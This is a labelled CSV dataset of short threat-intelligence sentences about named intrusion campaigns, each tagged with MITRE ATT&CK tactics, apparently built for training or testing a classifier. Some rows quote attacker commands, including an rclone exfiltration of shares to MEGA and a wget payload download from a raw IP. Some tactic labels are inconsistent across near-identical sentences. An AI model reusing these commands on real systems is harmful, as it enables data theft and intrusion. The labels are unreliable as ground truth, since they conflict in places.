text,label
"During the 2015 Ukraine Electric Power Attack, Sandworm Team modified in-registry internet settings to lower internet security.",['TA0005:Defense Evasion']
"During the 2015 Ukraine Electric Power Attack, Sandworm Team created privileged domain accounts to be used for further exploitation and lateral movement.",['TA0003:Persistence']
"During the 2015 Ukraine Electric Power Attack, Sandworm Team installed a modified Dropbear SSH client as the backdoor to target systems.","['TA0001:Initial Access', 'TA0003:Persistence']"
"During the 2015 Ukraine Electric Power Attack, vba_macro.exe deletes itself after `FONTCACHE.DAT`, `rundll32.exe`, and the associated .lnk file is delivered.",['TA0005:Defense Evasion']
"During the 2015 Ukraine Electric Power Attack, Sandworm Team pushed additional malicious tools onto an infected system to steal user credentials, move laterally, and destroy data.",['TA0011:Command and Control']
"During the 2015 Ukraine Electric Power Attack, Sandworm Team gathered account credentials via a BlackEnergy keylogger plugin.","['TA0009:Collection', 'TA0006:Credential Access']"
"During the 2015 Ukraine Electric Power Attack, Sandworm Team moved their tools laterally within the corporate network and between the ICS and corporate network.",['TA0008:Lateral Movement']
"During the 2015 Ukraine Electric Power Attack, Sandworm Team leveraged Microsoft Office attachments which contained malicious macros that were automatically executed once the user permitted them.",['TA0002:Execution']
"During the 2015 Ukraine Electric Power Attack, Sandworm Team modified in-registry Internet settings to lower internet security before launching `rundll32.exe`, which in-turn launches the malware and communicates with C2 servers over the Internet. .",['TA0005:Defense Evasion']
"During the 2015 Ukraine Electric Power Attack, Sandworm Team used BlackEnergy’s network sniffer module to discover user credentials being sent over the network between the local LAN and the power grid’s industrial control systems.","['TA0006:Credential Access', 'TA0007:Discovery']"
"During the 2015 Ukraine Electric Power Attack, Sandworm Team loaded BlackEnergy into svchost.exe, which then launched iexplore.exe for their C2.","['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
"During the 2015 Ukraine Electric Power Attack, Sandworm Team remotely discovered systems over LAN connections. OT systems were visible from the IT network as well, giving adversaries the ability to discover operational assets.",['TA0007:Discovery']
"During the 2015 Ukraine Electric Power Attack, Sandworm Team used a backdoor which could execute a supplied DLL using `rundll32.exe`.",['TA0005:Defense Evasion']
"During the 2015 Ukraine Electric Power Attack, Sandworm Team obtained their initial foothold into many IT systems using Microsoft Office attachments delivered through phishing emails.",['TA0001:Initial Access']
"During the 2015 Ukraine Electric Power Attack, Sandworm Team used valid accounts on the corporate network to escalate privileges, move laterally, and establish persistence within the corporate network.","['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
"During the 2015 Ukraine Electric Power Attack, Sandworm Team installed a VBA script called `vba_macro.exe`. This macro dropped `FONTCACHE.DAT`, the primary BlackEnergy implant; `rundll32.exe`, for executing the malware; `NTUSER.log`, an empty file; and desktop.ini, the default file used to determine folder displays on Windows machines.",['TA0002:Execution']
"During the 2015 Ukraine Electric Power Attack, Sandworm Team used BlackEnergy to communicate between compromised hosts and their command-and-control servers via HTTP post requests.",['TA0011:Command and Control']
"During the 2016 Ukraine Electric Power Attack, Sandworm Team used the `sp_addlinkedsrvlogin` command in MS-SQL to create a link between a created account and other servers in the network.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
"During the 2016 Ukraine Electric Power Attack, Sandworm Team used a script to attempt RPC authentication against a number of hosts.",['TA0006:Credential Access']
"During the 2016 Ukraine Electric Power Attack, Sandworm Team used a trojanized version of Windows Notepad to add a layer of persistence for Industroyer.",['TA0003:Persistence']
"During the 2016 Ukraine Electric Power Attack, Sandworm Team added a login to a SQL Server with `sp_addlinkedsrvlogin`.",['TA0003:Persistence']
"During the 2016 Ukraine Electric Power Attack, Sandworm Team disabled event logging on compromised systems.",['TA0005:Defense Evasion']
"During the 2016 Ukraine Electric Power Attack, Sandworm Team created two new accounts, “admin” and “система” . The accounts were then assigned to a domain matching local operation and were delegated new privileges.",['TA0003:Persistence']
"During the 2016 Ukraine Electric Power Attack, Sandworm Team used Mimikatz to capture and use legitimate credentials.",['TA0006:Credential Access']
"During the 2016 Ukraine Electric Power Attack, Sandworm Team used `move` to transfer files to a network share.",['TA0008:Lateral Movement']
"During the 2016 Ukraine Electric Power Attack, Sandworm Team created two new accounts, “admin” and “система” .",['TA0005:Defense Evasion']
"During the 2016 Ukraine Electric Power Attack, Sandworm Team masqueraded executables as `.txt` files.",['TA0005:Defense Evasion']
"During the 2016 Ukraine Electric Power Attack, DLLs and EXEs with filenames associated with common electric power sector protocols were used to masquerade files.",['TA0005:Defense Evasion']
"During the 2016 Ukraine Electric Power Attack, Sandworm Team used heavily obfuscated code with Industroyer in its Windows Notepad backdoor.",['TA0005:Defense Evasion']
"During the 2016 Ukraine Electric Power Attack, Sandworm Team used PowerShell scripts to run a credential harvesting tool in memory to evade defenses.",['TA0002:Execution']
"During the 2016 Ukraine Electric Power Attack, Sandworm Team checked for connectivity to resources within the network and used LDAP to query Active Directory, discovering information about computers listed in AD.",['TA0007:Discovery']
"During the 2016 Ukraine Electric Power Attack, Sandworm Team utilized `net use` to connect to network shares.",['TA0008:Lateral Movement']
"During the 2016 Ukraine Electric Power Attack, Sandworm Team used various MS-SQL stored procedures.",['TA0003:Persistence']
"During the 2016 Ukraine Electric Power Attack, Sandworm Team used UPX to pack a copy of Mimikatz.",['TA0005:Defense Evasion']
"During the 2016 Ukraine Electric Power Attack, Sandworm Team created VBScripts to run on an SSH server.",['TA0002:Execution']
"During the 2016 Ukraine Electric Power Attack, Sandworm Team used the `xp_cmdshell` command in MS-SQL.",['TA0002:Execution']
"During the 2016 Ukraine Electric Power Attack, WMI in scripts were used for remote execution and system surveys.",['TA0002:Execution']
"During the 2016 Ukraine Electric Power Attack, Sandworm Team used an arbitrary system service to load at system boot for persistence for Industroyer. They also replaced the ImagePath registry value of a Windows service with a new backdoor binary.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
"During the 2022 Ukraine Electric Power Attack, Sandworm Team deployed CaddyWiper on the victim’s IT environment systems to wipe files related to the OT capabilities, along with mapped drives, and physical drive partitions.",['TA0040:Impact']
"During the 2022 Ukraine Electric Power Attack, Sandworm Team leveraged Group Policy Objects to deploy and execute malware.","['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
"During the 2022 Ukraine Electric Power Attack, Sandworm Team used a Group Policy Object to copy CaddyWiper's executable `msserver.exe` from a staging server to a local hard drive before deployment.",['TA0008:Lateral Movement']
"During the 2022 Ukraine Electric Power Attack, Sandworm Team leveraged Systemd service units to masquerade GOGETTER malware as legitimate or seemingly legitimate services.",['TA0005:Defense Evasion']
"During the 2022 Ukraine Electric Power Attack, Sandworm Team proxied C2 communications within a TLS-based tunnel.",['TA0011:Command and Control']
"During the 2022 Ukraine Electric Power Attack, Sandworm Team utilized a PowerShell utility called TANKTRAP to spread and launch a wiper using Windows Group Policy.",['TA0002:Execution']
"During the 2022 Ukraine Electric Power Attack, Sandworm Team deployed the GOGETTER tunneler software to establish a “Yamux” TLS-based C2 channel with an external server.",['TA0011:Command and Control']
"During the 2022 Ukraine Electric Power Attack, Sandworm Team leveraged Scheduled Tasks through a Group Policy Object to execute CaddyWiper at a predetermined time.","['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
"During the 2022 Ukraine Electric Power Attack, Sandworm Team configured Systemd to maintain persistence of GOGETTER, specifying the `WantedBy=multi-user.target` configuration to run GOGETTER when the system begins accepting user logins.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
"During the 2022 Ukraine Electric Power Attack, Sandworm Team deployed the Neo-REGEORG webshell on an internet-facing server.",['TA0003:Persistence']
APT41 DUST used `rar` to compress data downloaded from internal Oracle databases prior to exfiltration.,['TA0009:Collection']
APT41 DUST used HTTPS for command and control.,['TA0011:Command and Control']
APT41 DUST used tools such as SQLULDR2 and PINEGROVE to gather local system and database information.,['TA0009:Collection']
APT41 DUST used compromised Google Workspace accounts for command and control.,['TA0042:Resource Development']
APT41 DUST used stolen code signing certificates for DUSTTRAP malware and subsequent payloads.,['TA0005:Defense Evasion']
APT41 DUST used stolen code signing certificates to sign DUSTTRAP malware and components.,['TA0042:Resource Development']
APT41 DUST involved the use of DLL search order hijacking to execute DUSTTRAP.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
APT41 DUST used DLL side-loading to execute DUSTTRAP via an AhnLab uninstaller.,"['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
APT41 DUST collected data from victim Oracle databases using SQLULDR2.,['TA0009:Collection']
APT41 DUST used encrypted payloads decrypted and executed in memory.,['TA0005:Defense Evasion']
APT41 DUST exfiltrated collected information to OneDrive.,['TA0010:Exfiltration']
APT41 DUST deleted various artifacts from victim systems following use.,['TA0005:Defense Evasion']
APT41 DUST involved execution of `certutil.exe` via web shell to download the DUSTPAN dropper.,['TA0011:Command and Control']
APT41 DUST involved exporting data from Oracle databases to local CSV files prior to exfiltration.,['TA0009:Collection']
APT41 DUST disguised DUSTPAN as a legitimate Windows binary such as `w3wp.exe` or `conn.exe`.,['TA0005:Defense Evasion']
APT41 DUST used internet scan data for target development.,['TA0043:Reconnaissance']
APT41 DUST involved use of search engines to research victim servers.,['TA0043:Reconnaissance']
APT41 DUST involved access of external victim websites for target development.,['TA0043:Reconnaissance']
APT41 DUST used infrastructure hosted behind Cloudflare or utilized Cloudflare Workers for command and control.,['TA0042:Resource Development']
APT41 DUST used Windows services to execute DUSTPAN.,['TA0002:Execution']
APT41 DUST used HTTPS for command and control.,['TA0011:Command and Control']
APT41 DUST used compromised Google Workspace accounts for command and control.,['TA0011:Command and Control']
APT41 DUST involved use of web shells such as ANTSWORD and BLUEBEAM for persistence.,['TA0003:Persistence']
APT41 DUST used Windows Services with names such as `Windows Defend` for persistence of DUSTPAN.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
"For C0010, UNC3890 actors established domains that appeared to be legitimate services and entities, such as LinkedIn, Facebook, Office 365, and Pfizer.",['TA0042:Resource Development']
"During C0010, UNC3890 actors likely compromised the domain of a legitimate Israeli shipping company.",['TA0042:Resource Development']
"During C0010, UNC3890 actors likely established a watering hole that was hosted on a login page of a legitimate Israeli shipping company that was active until at least November 2021.",['TA0001:Initial Access']
"For C0010, the threat actors compromised the login page of a legitimate Israeli shipping company and likely established a watering hole that collected visitor information.",['TA0042:Resource Development']
"During C0010, UNC3890 actors downloaded tools and malware onto a compromised host.",['TA0011:Command and Control']
"For C0010, UNC3890 actors used unique malware, including SUGARUSH and SUGARDUMP.",['TA0042:Resource Development']
"For C0010, UNC3890 actors obtained multiple publicly-available tools, including METASPLOIT, UNICORN, and NorthStar C2.",['TA0042:Resource Development']
"For C0010, UNC3890 actors staged malware on their infrastructure for direct download onto a compromised system.",['TA0042:Resource Development']
"For C0010, UNC3890 actors staged tools on their infrastructure to download directly onto a compromised system.",['TA0042:Resource Development']
"For C0011, Transparent Tribe established SSL certificates on the typo-squatted domains the group registered.",['TA0042:Resource Development']
"For C0011, Transparent Tribe registered domains likely designed to appear relevant to student targets in India.",['TA0042:Resource Development']
"During C0011, Transparent Tribe relied on a student target to open a malicious document delivered via email.",['TA0002:Execution']
"During C0011, Transparent Tribe relied on student targets to click on a malicious link sent via email.",['TA0002:Execution']
"During C0011, Transparent Tribe sent malicious attachments via email to student targets in India.",['TA0001:Initial Access']
"During C0011, Transparent Tribe sent emails containing a malicious link to student targets in India.",['TA0001:Initial Access']
"For C0011, Transparent Tribe hosted malicious documents on domains registered by the group.",['TA0042:Resource Development']
"For C0011, Transparent Tribe used malicious VBA macros within a lure document as part of the Crimson malware installation process onto a compromised host.",['TA0002:Execution']
"For C0015, the threat actors used DLL files that had invalid certificates.",['TA0005:Defense Evasion']
"During C0015, the threat actors used Conti ransomware to encrypt a compromised network.",['TA0040:Impact']
"During C0015, the threat actors limited Rclone's bandwidth setting during exfiltration.",['TA0010:Exfiltration']
"During C0015, the threat actors obtained files and data from the compromised network.",['TA0009:Collection']
"During C0015, the threat actors collected files from network shared drives prior to network encryption.",['TA0009:Collection']
"During C0015, the threat actors use the command `net group ""domain admins"" /dom` to enumerate domain groups.",['TA0007:Discovery']
"During C0015, the threat actors used the command `nltest /domain_trusts /all_trusts` to enumerate domain trusts.",['TA0007:Discovery']
"During C0015, the threat actors used a DLL named `D8B3.dll` that was injected into the Winlogon process.","['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
"During C0015, the threat actors exfiltrated files and sensitive data to the MEGA cloud storage site using the Rclone command `rclone.exe copy --max-age 2y ""\\SERVER\Shares"" Mega:DATA -q --ignore-existing --auto-confirm --multi-thread-streams 7 --transfers 7 --bwlimit 10M`.",['TA0010:Exfiltration']
"During C0015, the threat actors conducted a file listing discovery against multiple hosts to ensure locker encryption was successful.",['TA0007:Discovery']
"During C0015, the threat actors downloaded additional tools and files onto a compromised network.",['TA0011:Command and Control']
"During C0015, the threat actors used a malicious HTA file that contained a mix of encoded HTML and JavaScript/VBScript code.",['TA0002:Execution']
"During C0015, the threat actors used WMI to load Cobalt Strike onto additional hosts within a compromised network.",['TA0008:Lateral Movement']
"During C0015, PowerView's file share enumeration results were stored in the file `c:\ProgramData\found_shares.txt`.",['TA0009:Collection']
"During C0015, the threat actors used the command `net localgroup ""adminstrator"" ` to identify accounts with local administrator rights.",['TA0007:Discovery']
"During C0015, the threat actors relied on users to enable macros within a malicious Microsoft Word document.",['TA0002:Execution']
"For C0015, the threat actors used Cobalt Strike and Conti ransomware.",['TA0042:Resource Development']
"During C0015, the threat actors named a binary file `compareForfor.jpg` to disguise it as a JPG file.",['TA0005:Defense Evasion']
"During C0015, the threat actors used `mshta` to execute DLLs.",['TA0005:Defense Evasion']
"During C0015, the threat actors executed the PowerView ShareFinder module to identify open shares.",['TA0007:Discovery']
"During C0015, the threat actors used Base64-encoded strings.",['TA0005:Defense Evasion']
"During C0015, the threat actors used the `tasklist /s` command as well as `taskmanager` to obtain a list of running processes.",['TA0007:Discovery']
"During C0015, the threat actors employed code that used `regsvr32` for execution.",['TA0005:Defense Evasion']
"During C0015, the threat actors installed the AnyDesk remote desktop application onto the compromised network.",['TA0011:Command and Control']
"During C0015, the threat actors used RDP to access specific network hosts of interest.",['TA0008:Lateral Movement']
"During C0015, the threat actors used the commands `net view /all /domain` and `ping` to discover remote systems. They also used PowerView's PowerShell Invoke-ShareFinder script for file share enumeration.",['TA0007:Discovery']
"During C0015, the threat actors loaded DLLs via `rundll32` using the `svchost` process.",['TA0005:Defense Evasion']
"For C0015, security researchers assessed the threat actors likely used a phishing campaign to distribute a weaponized attachment to victims.",['TA0001:Initial Access']
"During C0015, the threat actors used code to obtain the external public-facing IPv4 address of the compromised host.",['TA0007:Discovery']
"During C0015, the threat actors used the command `net view /all time` to gather the local time of a compromised network.",['TA0007:Discovery']
"For C0015, the threat actors obtained a variety of tools, including AdFind, AnyDesk, and Process Hacker.",['TA0042:Resource Development']
"During C0015, the threat actors used a malicious HTA file that contained a mix of HTML and JavaScript/VBScript code.",['TA0002:Execution']
"During C0015, the threat actors used `cmd.exe` to execute commands and run malicious binaries.",['TA0002:Execution']
"During C0015, the threat actors used `wmic` and `rundll32` to load Cobalt Strike onto a target host.",['TA0002:Execution']
"During C0017, APT41 used a ConfuserEx obfuscated BADPOTATO exploit to abuse named-pipe impersonation for local `NT AUTHORITY\SYSTEM` privilege escalation.","['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
"During C0017, APT41 hex-encoded PII data prior to exfiltration.",['TA0009:Collection']
"During C0017, APT41 collected information related to compromised machines as well as Personal Identifiable Information from victim networks.",['TA0009:Collection']
"During C0017, APT41 used dead drop resolvers on two separate tech community forums for their KEYPLUG Windows-version backdoor; notably APT41 updated the community forum posts frequently with new dead drop resolvers during the campaign.",['TA0011:Command and Control']
"During C0017, APT41 used the DUSTPAN loader to decrypt embedded payloads.",['TA0005:Defense Evasion']
"During C0017, APT41 used its Cloudflare services C2 channels for data exfiltration.",['TA0010:Exfiltration']
"During C0017, APT41 exfiltrated victim data via DNS lookups by encoding and prepending it as subdomains to the attacker-controlled domain.",['TA0010:Exfiltration']
"During C0017, APT41 used Cloudflare services for data exfiltration.",['TA0010:Exfiltration']
"During C0017, APT41 exploited CVE-2021-44207 in the USAHerds application and CVE-2021-44228 in Log4j, as well as other .NET deserialization, SQL injection, and directory traversal vulnerabilities to gain initial access.",['TA0001:Initial Access']
"During C0017, APT41 established persistence by loading malicious libraries via modifications to the Import Address Table within legitimate Microsoft binaries.","['TA0005:Defense Evasion', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
"During C0017, APT41 downloaded malicious payloads onto compromised systems.",['TA0011:Command and Control']
"During C0017, APT41 deployed JScript web shells on compromised systems.",['TA0002:Execution']
"During C0017, APT41 copied the local `SAM` and `SYSTEM` Registry hives to a staging directory.",['TA0009:Collection']
"During C0017, APT41 used `SCHTASKS /Change` to modify legitimate scheduled tasks to run malicious code.",['TA0005:Defense Evasion']
"During C0017, APT41 used file names beginning with USERS, SYSUSER, and SYSLOG for DEADEYE, and changed KEYPLUG file extensions from .vmp to .upx likely to avoid hunting detections.",['TA0005:Defense Evasion']
"During C0017, APT41 broke malicious binaries, including DEADEYE and KEYPLUG, into multiple sections on disk to evade detection.",['TA0005:Defense Evasion']
"During C0017, APT41 frequently configured the URL endpoints of their stealthy passive backdoor LOWKEY.PASSIVE to masquerade as normal web application traffic on an infected server.",['TA0011:Command and Control']
"During C0017, APT41 used the Cloudflare CDN to proxy C2 traffic.",['TA0011:Command and Control']
"During C0017, APT41 used the following Windows scheduled tasks for DEADEYE dropper persistence on US state government networks: `\Microsoft\Windows\PLA\Server Manager Performance Monitor`, `\Microsoft\Windows\Ras\ManagerMobility`, `\Microsoft\Windows\WDI\SrvSetupResults`, and `\Microsoft\Windows\WDI\USOShared`.","['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
"During C0017, APT41 copied the `SAM` and `SYSTEM` Registry hives for credential harvesting.",['TA0006:Credential Access']
"During C0017, APT41 used VMProtect to slow the reverse engineering of malicious binaries.",['TA0005:Defense Evasion']
"During C0017, APT41 issued `ping -n 1 .split-1+` commands to find the volume serial number of compromised systems.",['TA0007:Discovery']
"During C0017, APT41 used `cmd.exe /c ping %userdomain%` for discovery.",['TA0007:Discovery']
"During C0017, APT41 used `whoami` to gather information from victim machines.",['TA0007:Discovery']
"For C0017, APT41 obtained publicly available tools such as YSoSerial.NET, ConfuserEx, and BadPotato.",['TA0042:Resource Development']
"During C0017, APT41 ran `wget http://103.224.80.44:8080/kernel` to download malicious payloads.",['TA0011:Command and Control']
"During C0017, APT41 used the Cloudflare services for C2 communications.",['TA0011:Command and Control']
"During C0017, APT41 deployed JScript web shells through the creation of malicious ViewState objects.",['TA0003:Persistence']
"During C0017, APT41 used `cmd.exe` to execute reconnaissance commands.",['TA0002:Execution']
"During C0018, the threat actors used Base64 to encode their PowerShell scripts.",['TA0005:Defense Evasion']
"During C0018, the threat actors used AvosLocker ransomware to encrypt files on the compromised network.",['TA0040:Impact']
"During C0018, the threat actors exploited VMWare Horizon Unified Access Gateways that were vulnerable to several Log4Shell vulnerabilities, including CVE-2021-44228, CVE-2021-45046, CVE-2021-45105, and CVE-2021-44832.",['TA0001:Initial Access']
"During C0018, the threat actors downloaded additional tools, such as Mimikatz and Sliver, as well as Cobalt Strike and AvosLocker ransomware onto the victim network.",['TA0011:Command and Control']
"During C0018, the threat actors transferred the SoftPerfect Network Scanner and other tools to machines in the network using AnyDesk and PDQ Deploy.",['TA0008:Lateral Movement']
"During C0018, AvosLocker was disguised using the victim company name as the filename.",['TA0005:Defense Evasion']
"For C0018, the threat actors renamed a Sliver payload to `vmware_kb.exe`.",['TA0005:Defense Evasion']
"During C0018, the threat actors used the SoftPerfect Network Scanner for network scanning.",['TA0007:Discovery']
"During C0018, the threat actors opened a variety of ports, including ports 28035, 32467, 41578, and 46892, to establish RDP connections.",['TA0011:Command and Control']
"During C0018, the threat actors used encoded PowerShell scripts for execution.",['TA0002:Execution']
"During C0018, the threat actors used AnyDesk to transfer tools between systems.",['TA0011:Command and Control']
"During C0018, the threat actors opened a variety of ports to establish RDP connections, including ports 28035, 32467, 41578, and 46892.",['TA0008:Lateral Movement']
"During C0018, the threat actors used `rundll32` to run Mimikatz.",['TA0005:Defense Evasion']
"During C0018, the threat actors used PDQ Deploy to move AvosLocker and tools across the network.","['TA0002:Execution', 'TA0008:Lateral Movement']"
"During C0018, the threat actors ran `nslookup` and Advanced IP Scanner on the target network.",['TA0007:Discovery']
"During C0018, the threat actors collected `whoami` information via PowerShell scripts.",['TA0007:Discovery']
"For C0018, the threat actors acquired a variety of open source tools, including Mimikatz, Sliver, SoftPerfect Network Scanner, AnyDesk, and PDQ Deploy.",['TA0042:Resource Development']
"During C0018, the threat actors used HTTP for C2 communications.",['TA0011:Command and Control']
"During C0018, the threat actors used WMIC to modify administrative settings on both a local and a remote host, likely as part of the first stages for their lateral movement; they also used WMI Provider Host to execute a variety of encoded PowerShell scripts using the `DownloadString` method.",['TA0002:Execution']
"During C0021, the threat actors used SSL via TCP port 443 for C2 communications.",['TA0011:Command and Control']
"During C0021, the threat actors used encoded PowerShell commands.",['TA0005:Defense Evasion']
"During C0021, the threat actors deobfuscated encoded PowerShell commands including use of the specific string `'FromBase'+0x40+'String'`, in place of `FromBase64String` which is normally used to decode base64.",['TA0005:Defense Evasion']
"For C0021, the threat actors registered domains for use in C2.",['TA0042:Resource Development']
"For C0021, the threat actors used legitimate but compromised domains to host malicious payloads.",['TA0042:Resource Development']
"For C0021, the threat actors embedded a base64-encoded payload within a LNK file.",['TA0005:Defense Evasion']
"During C0021, the threat actors downloaded additional tools and files onto victim machines.",['TA0011:Command and Control']
"During C0021, the threat actors lured users into clicking a malicious link which led to the download of a ZIP archive containing a malicious .LNK file.",['TA0002:Execution']
"During C0021, the threat actors used TCP for some C2 communications.",['TA0011:Command and Control']
"During C0021, the threat actors used obfuscated PowerShell to extract an encoded payload from within an .LNK file.",['TA0002:Execution']
"During C0021, the threat actors used `rundll32.exe` to execute the Cobalt Strike Beacon loader DLL.",['TA0005:Defense Evasion']
"During C0021, the threat actors sent phishing emails with unique malicious links, likely for tracking victim clicks.",['TA0001:Initial Access']
"For C0021, the threat actors used Cobalt Strike configured with a modified variation of the publicly available Pandora Malleable C2 Profile.",['TA0042:Resource Development']
"For C0021, the threat actors uploaded malware to websites under their control.",['TA0042:Resource Development']
"During C0021, the threat actors used HTTP for some of their C2 communications.",['TA0011:Command and Control']
"During C0026, the threat actors used WinRAR to collect documents on targeted systems. The threat actors appeared to only exfiltrate files created after January 1, 2021.",['TA0009:Collection']
"During C0026, the threat actors split encrypted archives containing stolen files and information into 3MB parts prior to exfiltration.",['TA0010:Exfiltration']
"During C0026, the threat actors collected documents from compromised hosts.",['TA0009:Collection']
"For C0026, the threat actors re-registered expired C2 domains previously used for ANDROMEDA malware.",['TA0042:Resource Development']
"During C0026, the threat actors re-registered a ClouDNS dynamic DNS subdomain which was previously used by ANDROMEDA.",['TA0011:Command and Control']
"During C0026, the threat actors downloaded malicious payloads onto select compromised hosts.",['TA0011:Command and Control']
"During C0027, Scattered Spider used aws_consoler to create temporary federated credentials for fake users in order to obfuscate which AWS credential is compromised and enable pivoting from the AWS CLI to console sessions without MFA.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
"During C0027, Scattered Spider used IAM manipulation to gain persistence and to assume or elevate privileges.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
"During C0027, Scattered Spider accessed Azure AD to download bulk lists of group members and to identify privileged users, along with the email addresses and AD attributes.",['TA0007:Discovery']
"During C0027, Scattered Spider leveraged compromised credentials from victim users to authenticate to Azure tenants.","['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
"During C0027, Scattered Spider accessed Azure AD to download bulk lists of group members and their Active Directory attributes.",['TA0007:Discovery']
"During C0027, Scattered Spider used compromised Azure credentials for credential theft activity and lateral movement to on-premises systems.",['TA0008:Lateral Movement']
"During C0027, Scattered Spider used access to the victim's Azure tenant to create Azure VMs.",['TA0005:Defense Evasion']
"During C0027, Scattered Spider sent phishing messages via SMS to steal credentials.",['TA0043:Reconnaissance']
"During C0027, Scattered Spider performed domain replication.",['TA0006:Credential Access']
"During C0027, Scattered Spider accessed victim OneDrive environments to search for VPN and MFA enrollment information, help desk instructions, and new hire guides.",['TA0009:Collection']
"During C0027, Scattered Spider registered devices for MFA to maintain persistence through victims' VPN.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
"During C0027, Scattered Spider accessed Azure AD to identify email addresses.",['TA0007:Discovery']
"During C0027, Scattered Spider exploited CVE-2021-35464 in the ForgeRock Open Access Management application server to gain initial access.",['TA0001:Initial Access']
"During C0027, Scattered Spider used Citrix and VPNs to persist in compromised environments.","['TA0001:Initial Access', 'TA0003:Persistence']"
"During C0027, Scattered Spider impersonated legitimate IT personnel in phone calls and text messages either to direct victims to a credential harvesting site or getting victims to run commercial remote monitoring and management tools.",['TA0005:Defense Evasion']
"During C0027, Scattered Spider downloaded tools using victim organization systems.",['TA0011:Command and Control']
"During C0027, Scattered Spider attempted to gain access by continuously sending MFA messages to the victim until they accept the MFA push challenge.",['TA0006:Credential Access']
"During C0027, used RustScan to scan for open ports on targeted ESXi appliances.",['TA0007:Discovery']
"During C0027, Scattered Spider used SSH tunneling in targeted environments.",['TA0011:Command and Control']
"During C0027, Scattered Spider installed the open-source rsocx reverse proxy tool on a targeted ESXi appliance.",['TA0011:Command and Control']
"During C0027, Scattered Spider directed victims to run remote monitoring and management tools.",['TA0011:Command and Control']
"During C0027, Scattered Spider accessed victim SharePoint environments to search for VPN and MFA enrollment information, help desk instructions, and new hire guides.",['TA0009:Collection']
"During C0027, Scattered Spider sent Telegram messages impersonating IT personnel to harvest credentials.",['TA0043:Reconnaissance']
"During C0027, Scattered Spider used phone calls to instruct victims to navigate to credential-harvesting websites.",['TA0043:Reconnaissance']
"During C0027, Scattered Spider impersonated legitimate IT personnel in phone calls to direct victims to download a remote monitoring and management tool that would allow the adversary to remotely control their system.",['TA0001:Initial Access']
"During C0027, Scattered Spider obtained and used multiple tools including the LINpeas privilege escalation utility, aws_consoler, rsocx reverse proxy, Level RMM tool, and RustScan port scanner.",['TA0042:Resource Development']
"During C0027, Scattered Spider downloaded tools from sites including file.io, GitHub, and paste.ee.",['TA0011:Command and Control']
"During C0027, Scattered Spider used Windows Management Instrumentation to move laterally via Impacket.",['TA0002:Execution']
"During the C0032 campaign, TEMP.Veles used VPN access to persist in the victim environment.","['TA0001:Initial Access', 'TA0003:Persistence']"
"During the C0032 campaign, TEMP.Veles routinely deleted tools, logs, and other files after they were finished with them.",['TA0005:Defense Evasion']
"During the C0032 campaign, TEMP.Veles modified and added entries within HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options to maintain persistence.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
"During the C0032 campaign, TEMP.Veles used Mimikatz and a custom tool, SecHack, to harvest credentials.",['TA0006:Credential Access']
"During the C0032 campaign, TEMP.Veles used staging folders that are infrequently used by legitimate users or processes to store data for exfiltration and tool deployment.",['TA0009:Collection']
"During the C0032 campaign, TEMP.Veles renamed files to look like legitimate files, such as Windows update files or Schneider Electric application files.",['TA0005:Defense Evasion']
"During the C0032 campaign, TEMP.Veles used port-protocol mismatches on ports such as 443, 4444, 8531, and 50501 during C2.",['TA0011:Command and Control']
"During the C0032 campaign, TEMP.Veles used PowerShell to perform timestomping.",['TA0002:Execution']
"During the C0032 campaign, TEMP.Veles used encrypted SSH-based PLINK tunnels to transfer tools and enable RDP connections throughout the environment.",['TA0011:Command and Control']
"During the C0032 campaign, TEMP.Veles utilized RDP throughout an operation.",['TA0008:Lateral Movement']
"During the C0032 campaign, TEMP.Veles relied on encrypted SSH-based tunnels to transfer tools and for remote command/program execution.",['TA0008:Lateral Movement']
"During the C0032 campaign, TEMP.Veles used scheduled task XML triggers.","['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
"During the C0032 campaign, TEMP.Veles used timestomping to modify the $STANDARD_INFORMATION attribute on tools.",['TA0005:Defense Evasion']
"During the C0032 campaign, TEMP.Veles obtained and used tools such as Mimikatz and PsExec.",['TA0042:Resource Development']
"During the C0032 campaign, TEMP.Veles used compromised VPN accounts.","['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
"During the C0032 campaign, TEMP.Veles used Virtual Private Server infrastructure.",['TA0042:Resource Development']
"During the C0032 campaign, TEMP.Veles planted Web shells on Outlook Exchange servers.",['TA0003:Persistence']
"During CostaRicto, the threat actors collected data and files from compromised networks.",['TA0009:Collection']
"For CostaRicto, the threat actors established domains, some of which appeared to spoof legitimate domains.",['TA0042:Resource Development']
"During CostaRicto, the threat actors set up remote tunneling using an SSH tool to maintain access to a compromised environment.","['TA0001:Initial Access', 'TA0003:Persistence']"
"During CostaRicto, the threat actors downloaded malware and tools onto a compromised host.",['TA0011:Command and Control']
"For CostaRicto, the threat actors used custom malware, including PS1, CostaBricks, and SombRAT.",['TA0042:Resource Development']
"During CostaRicto, the threat actors used a layer of proxies to manage C2 communications.",['TA0011:Command and Control']
"During CostaRicto, the threat actors employed nmap and pscan to scan target environments.",['TA0007:Discovery']
"During CostaRicto, the threat actors set up remote SSH tunneling into the victim's environment from a malicious domain.",['TA0011:Command and Control']
"During CostaRicto, the threat actors used scheduled tasks to download backdoor tools.","['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
"During CostaRicto, the threat actors obtained open source tools to use in their operations.",['TA0042:Resource Development']
